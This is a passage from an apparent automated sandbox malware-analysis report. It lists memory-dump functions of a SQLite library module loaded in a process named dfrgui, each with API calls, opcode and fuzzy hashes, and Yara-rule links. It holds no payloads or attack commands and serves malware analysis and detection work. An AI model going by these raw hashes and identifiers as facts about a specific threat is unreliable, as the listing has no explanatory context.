                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                  • String ID:
                                  • API String ID: 402655203-0
                                  • Opcode ID: a811b6409f0759cf6997d57d43276ad95d41844afc37b0f1161771124385239c
                                  • Instruction ID: 6a0758c42ae1e604339376f4f8d53179b7bebac114f3208adbf90a060df19d49
                                  • Opcode Fuzzy Hash: a811b6409f0759cf6997d57d43276ad95d41844afc37b0f1161771124385239c
                                  • Instruction Fuzzy Hash: 15412AB49092A59ACB10DFA8C19469DBBF1ABC9318F25C56ED494AB345C37AC841CB12
                                  Function 61E370BE Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_int.SQLITE3 ref: 61E370F0
                                  • sqlite3_mprintf.SQLITE3 ref: 61E371AB
                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E371B9
                                  • sqlite3_free.SQLITE3 ref: 61E371DB
                                  • sqlite3_result_double.SQLITE3 ref: 61E371EA
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_int
                                  • String ID:
                                  • API String ID: 2195261611-0
                                  • Opcode ID: 491c61b412f44c0cc50fa84f04fc76056ad300c4c8d9c33b3b478ed49b724a0e
                                  • Instruction ID: ab4421ae32dba9cce53739a684db029bfce24d089a98a5a2ebcfe30a01e2949d
                                  • Opcode Fuzzy Hash: 491c61b412f44c0cc50fa84f04fc76056ad300c4c8d9c33b3b478ed49b724a0e
                                  • Instruction Fuzzy Hash: A931BDB2E0966ADADF016F91C8805DEBBF1FFC9348F248849D88166315E735CC95CB82
                                  Function 61E51338 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 61E12E95: sqlite3_mutex_try.SQLITE3(?,?,?,61E12F15), ref: 61E12E35
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E5139C
                                  • sqlite3_mutex_free.SQLITE3 ref: 61E513DD
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E513ED
                                  • sqlite3_free.SQLITE3 ref: 61E5141C
                                  • sqlite3_free.SQLITE3 ref: 61E5143B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                  • String ID:
                                  • API String ID: 1894464702-0
                                  • Opcode ID: d730244c004e27410129d2a99dea69833ec46062e049426a58814ce139e51318
                                  • Instruction ID: a6a79ba0ec26040724096cfa0f888bfc99a47bf25a91c01ac0ebd080d00544cc
                                  • Opcode Fuzzy Hash: d730244c004e27410129d2a99dea69833ec46062e049426a58814ce139e51318
                                  • Instruction Fuzzy Hash: 43315E307046428BDB54EFEAC4C0A1ABBF5BF85308B75C56DD9458B706E732D892CB81
                                  Function 61E1CD4C Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_malloc.SQLITE3 ref: 61E1CD5C
                                    • Part of subcall function 61E1810B: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17DE4,?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E18113
                                  • memcmp.MSVCRT ref: 61E1CDCE
                                  • memcmp.MSVCRT ref: 61E1CDF3
                                  • memcmp.MSVCRT ref: 61E1CE24
                                  • memcmp.MSVCRT ref: 61E1CE50
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                  • String ID:
                                  • API String ID: 40721531-0
                                  • Opcode ID: 94d80959e6858ee27ba57683b241251a90d8af0ee47696ff4ed14421864d2aab
                                  • Instruction ID: f44cadb88f58c187159c93ae848d07c0bf28b65487fcbd2bbb19f5dee5dd872c
                                  • Opcode Fuzzy Hash: 94d80959e6858ee27ba57683b241251a90d8af0ee47696ff4ed14421864d2aab
                                  • Instruction Fuzzy Hash: 80315271B0C3019BE7009F69C58176ABBE5EFC5348F25C42DE849CB398D779D4868B82
                                  Function 61E29103 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_log.SQLITE3 ref: 61E29131
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E29241), ref: 61E29145
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E29241), ref: 61E2916D
                                  • sqlite3_log.SQLITE3 ref: 61E2918B
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E29241), ref: 61E291C1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                  • String ID:
                                  • API String ID: 1015584638-0
                                  • Opcode ID: 1ebb0a6512d9c02287f3840fa87a363290ca4d48b9f63dc5b5cb3d2dc29f9e74
                                  • Instruction ID: 425444e7821273beab728961d90e283895a8a51f89ed4af1f84472adb092b93f
                                  • Opcode Fuzzy Hash: 1ebb0a6512d9c02287f3840fa87a363290ca4d48b9f63dc5b5cb3d2dc29f9e74
                                  • Instruction Fuzzy Hash: 4931D1396046608BD700AFA9C8A474677E2EFC9318F3AC96DEC588F34AD774D841C752
                                  Function 61E44D3A Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E44D4F
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E44D5A
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E44E13
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E44E1E
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                  • String ID:
                                  • API String ID: 1477753154-0
                                  • Opcode ID: 56ecbd7e4e3f8e075256f06779ad3b86d79dbe1932b66257f5aeb04743c77def
                                  • Instruction ID: 17a30a48d5dc9d3f7a04ee0bc8d0a3da027d6ab760a0ca4e27e53b8cdcb6d9ad
                                  • Opcode Fuzzy Hash: 56ecbd7e4e3f8e075256f06779ad3b86d79dbe1932b66257f5aeb04743c77def
                                  • Instruction Fuzzy Hash: 43216BB47097518BD706AF68D48070ABBE4FF85318F25C42EE8988B301D774D851CB92
                                  Function 61E34DCE Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_initialize.SQLITE3 ref: 61E34DDC
                                    • Part of subcall function 61E17C24: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17C5B
                                    • Part of subcall function 61E17C24: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21F32), ref: 61E17C8F
                                    • Part of subcall function 61E17C24: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F58
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E34DF4
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E34E17
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E34E5B
                                  • sqlite3_memory_used.SQLITE3 ref: 61E34E60
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                  • String ID:
                                  • API String ID: 2853221962-0
                                  • Opcode ID: 85f8b2b461cfcf11b9884670a6cf5e07642387d880f86804736e967274eedc58
                                  • Instruction ID: 76c2bdaa9a0e4a456919d5c767e30a4b59763be70ae7ce720fb7a51b0dcbc32b
                                  • Opcode Fuzzy Hash: 85f8b2b461cfcf11b9884670a6cf5e07642387d880f86804736e967274eedc58
                                  • Instruction Fuzzy Hash: 3E114C74A14A559BCF04DFBEC44055977F5BBCA618B24CA2BF954CB340D731E881CB91
                                  Function 61E34B85 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 156COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_result_int64.SQLITE3 ref: 61E34C93
                                  • sqlite3_result_text.SQLITE3 ref: 61E34DBC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_result_int64sqlite3_result_text
                                  • String ID: 4a$:a
                                  • API String ID: 1704945000-1963086946
                                  • Opcode ID: 71bc73a378b287580fa2d30d0fe5302ce2ea0a7fb66037921364d46e5cb6a655
                                  • Instruction ID: 59a19e874174a6bd74bfa4a75b2b29a1aa1f30513b7d45bdf2fbca5ac6df64eb
                                  • Opcode Fuzzy Hash: 71bc73a378b287580fa2d30d0fe5302ce2ea0a7fb66037921364d46e5cb6a655
                                  • Instruction Fuzzy Hash: B2619F705083A58FDB14CF28C48475ABBE1AFC9318F64C95ED8988B385D736D885CF41
                                  Function 61E26D8F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_win32_is_nt
                                  • String ID: winAccess
                                  • API String ID: 2284118020-3605117275
                                  • Opcode ID: 296cbe50b3dfa0cbe8de44f57f3521292d90aa88037223ac085378cef338d928
                                  • Instruction ID: dfc275d53aa29049084ae5dae1c58b42d86fb017724081365478aef60775f6d9
                                  • Opcode Fuzzy Hash: 296cbe50b3dfa0cbe8de44f57f3521292d90aa88037223ac085378cef338d928
                                  • Instruction Fuzzy Hash: 23318172908299CFDB009EA4C95435EB7B1AB89328F218729EC6597380D774D956CB82
                                  Function 61E5D70B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 3$d
                                  • API String ID: 0-1650181692
                                  • Opcode ID: b499e8900f97afec89a2fbd53c99d00449c99c016268d57d619438542e137dbd
                                  • Instruction ID: 1df2370060883c66a53e1dde676c53e613f01413908c812f323d4ea88ecb673c
                                  • Opcode Fuzzy Hash: b499e8900f97afec89a2fbd53c99d00449c99c016268d57d619438542e137dbd
                                  • Instruction Fuzzy Hash: B0312878A042558FEB618F25C480789BBF0BB06318F64C5AADC989B346D375D990CF91
                                  Function 61E39510 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 61E24F57: sqlite3_value_text.SQLITE3 ref: 61E24F6A
                                    • Part of subcall function 61E24F57: sqlite3_value_bytes.SQLITE3 ref: 61E24F76
                                    • Part of subcall function 61E24F57: sqlite3_get_auxdata.SQLITE3 ref: 61E24F94
                                    • Part of subcall function 61E24F57: memcmp.MSVCRT ref: 61E24FB5
                                  • sqlite3_value_text.SQLITE3 ref: 61E39575
                                    • Part of subcall function 61E393FD: sqlite3_mprintf.SQLITE3 ref: 61E3944F
                                    • Part of subcall function 61E393FD: sqlite3_result_error.SQLITE3 ref: 61E39469
                                    • Part of subcall function 61E393FD: sqlite3_free.SQLITE3 ref: 61E39471
                                  • sqlite3_result_subtype.SQLITE3 ref: 61E39619
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_text$memcmpsqlite3_freesqlite3_get_auxdatasqlite3_mprintfsqlite3_result_errorsqlite3_result_subtypesqlite3_value_bytes
                                  • String ID: J$null
                                  • API String ID: 3173415908-802103870
                                  • Opcode ID: f2bade5427bf0e033a27700e97a4750aef713548ca2e0f67a61d319135f435b2
                                  • Instruction ID: a906e46988a9dabecf0ed8e4380dfcf82b82351f8ad6453b365838df107e1250
                                  • Opcode Fuzzy Hash: f2bade5427bf0e033a27700e97a4750aef713548ca2e0f67a61d319135f435b2
                                  • Instruction Fuzzy Hash: C9310B70A046A9DBDB10EF65C880B8E77B5AFC5318F20C06AE85C8B341DB35DA85CF91
                                  Function 61E39759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_text.SQLITE3 ref: 61E39794
                                  • sqlite3_value_text.SQLITE3 ref: 61E397B4
                                  • sqlite3_result_value.SQLITE3 ref: 61E397FC
                                    • Part of subcall function 61E39162: sqlite3_mprintf.SQLITE3 ref: 61E39177
                                    • Part of subcall function 61E39162: sqlite3_result_error.SQLITE3 ref: 61E3918D
                                    • Part of subcall function 61E39162: sqlite3_free.SQLITE3 ref: 61E39195
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                  • String ID: replace
                                  • API String ID: 822508682-211625029
                                  • Opcode ID: 3238d79b95bf4eac617cd81dbc65618d3bf50c6ab1ff18f301b4120ddb5aa2af
                                  • Instruction ID: 9e708afe98d993102cb750a3885a85318c31dbb7939dd1b47c4ecfe23680b6e6
                                  • Opcode Fuzzy Hash: 3238d79b95bf4eac617cd81dbc65618d3bf50c6ab1ff18f301b4120ddb5aa2af
                                  • Instruction Fuzzy Hash: E1217C75A08398DBCB01DF68C484A9EBBE5AFC4318F24C45DEC888B350DB35E944CB81
                                  Function 61E1BF06 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_malloc.SQLITE3 ref: 61E1BF24
                                    • Part of subcall function 61E1810B: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17DE4,?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E18113
                                  • sqlite3_realloc.SQLITE3 ref: 61E1BF72
                                  • sqlite3_free.SQLITE3 ref: 61E1BF88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                  • String ID: d
                                  • API String ID: 211589378-2564639436
                                  • Opcode ID: a7596c5a604db98bb88ca421dd0a5bbae294bcab6de6a91d89037c8facb0ff44
                                  • Instruction ID: 7e883275f96bed8c623a78fb91f5e40ecf046df512701315b916c6e4743df786
                                  • Opcode Fuzzy Hash: a7596c5a604db98bb88ca421dd0a5bbae294bcab6de6a91d89037c8facb0ff44
                                  • Instruction Fuzzy Hash: 3421C2B1A082058FDB10CFA9C8C1B5ABBF4EB8D314F14C469D9499B319D779E845CFA1
                                  Function 61E1F772 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
